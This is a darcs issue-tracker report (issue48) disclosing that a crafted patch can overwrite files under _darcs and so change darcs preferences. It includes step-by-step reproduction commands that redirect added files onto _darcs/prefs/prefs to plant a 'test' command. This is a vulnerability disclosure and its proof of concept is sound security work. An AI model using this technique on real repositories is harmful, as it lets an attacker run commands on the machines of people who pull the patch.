[darcs-devel] [issue48] malicious patch can alter darcs preferences!

[Nils Decker]

New submission from Nils Decker <darcs at ndecker.de>:

It is possible to create a patch that overwrites any file in _darcs. This can be
used to execute arbitary commands for example by overwriting the test setpref.

Create malicious patch:
cd a
darcs init
darcs setpref test malicious
mkdir test
touch test/x
darcs add test/x
edit _darcs/patches/pending:
  - remove setpref
  - change adddir and addfile to _darcs/prefs/prefs
darcs rec --no-test

Use patch:
cd b
darcs init
darcs setpref test safe
darcs pull ../a
cat _darcs/prefs/prefs
 > test malicious


darcs -v
1.0.3 (release)
( debian testing )

----------
messages: 178
nosy: droundy, ndecker, tommy
priority: urgent
status: unread
title: malicious patch can alter darcs preferences!

____________________________________
Darcs issue tracker <bugs at darcs.net>
<http://bugs.darcs.net/issue48>
____________________________________